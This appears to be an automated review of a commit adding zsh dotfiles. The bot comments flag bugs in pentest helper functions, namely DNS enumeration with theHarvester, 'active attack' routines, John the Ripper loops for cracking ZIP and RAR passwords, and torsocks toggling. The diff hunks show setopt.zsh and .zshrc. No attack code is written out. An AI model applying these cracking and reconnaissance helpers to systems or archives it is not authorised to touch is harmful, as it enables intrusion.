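Review bot: In `dns_enum_tof` the directory is assigned to `dettmpfold` but `mkdir -p $sctmpfold` and `cd $sctmpfold` read the unset `sctmpfold`, so `mkdir` runs with no operand and `cd` goes to `$HOME`, where `1_harvester_*.txt` is then written; the same variable name must be used in all three places. In `dns_enum_tof`, `scan_enum_tof` and `active_attack_tof` the path is double-quoted as `"~/.ptz/result-…"`, and tilde expansion does not happen inside quotes, so each run creates a literal `~` directory under the current directory — use `"$HOME/.ptz/result-scan-$cdate"`. Neither `mkdir -p` nor `cd` is checked, so when either fails every later output file lands in whatever the current directory happens to be; `mkdir -p "$sctmpfold" || return` and `cd "$sctmpfold" || return` stop that. `johnzip` iterates `for i in $(john … --stdout)`, which splits candidates on whitespace, while `johnrar` uses a `while read i` loop; aligning `johnzip` on `while IFS= read -r i` and quoting `"$i"` makes both handle candidates containing spaces or backslashes. The `.pentest_functions.zsh.swp` and `README.md~` editor artefacts added by the same commit should be removed and listed in `.gitignore`.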
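Review bot: `trso` stores the torsocks check in `trsochk` and then discards it by re-running the same pipeline inside `[[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]]`, so every prompt redraw spawns `torsocks show` twice; test the variable instead, `if [[ -z $trsochk ]]`. In `git_prompt_info` the `ahead` branch runs `git checkout HEAD` on every prompt, a working-tree command rather than a read-only query, while the `gitst` output captured two lines above normally already contains the "Your branch is ahead" text; `elif [[ ${gitst} =~ "ahead" ]]` gives the same result without side effects. `$(whoami)` in PROMPT can be replaced by the built-in `%n` escape, which avoids a fork per redraw.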
+++ b/profile_files/.zsh/setopt.zsh
@@ -0,0 +1,4 @@
+setopt AUTO_CD
+setopt COMPLETE_IN_WORD
+setopt ALWAYS_TO_END
+setopt PROMPT_SUBST
diff --git a/profile_files/.zshrc b/profile_files/.zshrc
new file mode 100644
index 0000000..45b0ff2
--- /dev/null
+++ b/profile_files/.zshrc
@@ -0,0 +1,14 @@
+source ~/.zsh/colors.zsh
+source ~/.zsh/setopt.zsh
+source ~/.zsh/prompt.zsh
+source ~/.zsh/completion.zsh
+source ~/.zsh/aliases.zsh
+source ~/.zsh/bindkeys.zsh
+source ~/.zsh/functions.zsh
+source ~/.zsh/general_functions.zsh
+source ~/.zsh/pentest_functions.zsh
+source ~/.zsh/history.zsh
+
+zstyle ':completion:*' menu select
+
+. torsocks on
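Review bot: `source ~/.zsh/functions.zsh` refers to a file this commit does not add (it is absent from the diffstat and from the other `.zsh` files created here), so every new shell will report a missing file; either drop the line or guard it, `[[ -r ~/.zsh/functions.zsh ]] && source ~/.zsh/functions.zsh`. The trailing `. torsocks on` runs unconditionally for every interactive shell and assumes `torsocks` is on PATH; `command -v torsocks >/dev/null && . torsocks on` keeps shells usable on machines without it. A short comment above that line recording that torsocks is enabled by default, and that `ton`/`tof` in pentest_functions.zsh toggle it, would make the startup behaviour clear to the next reader.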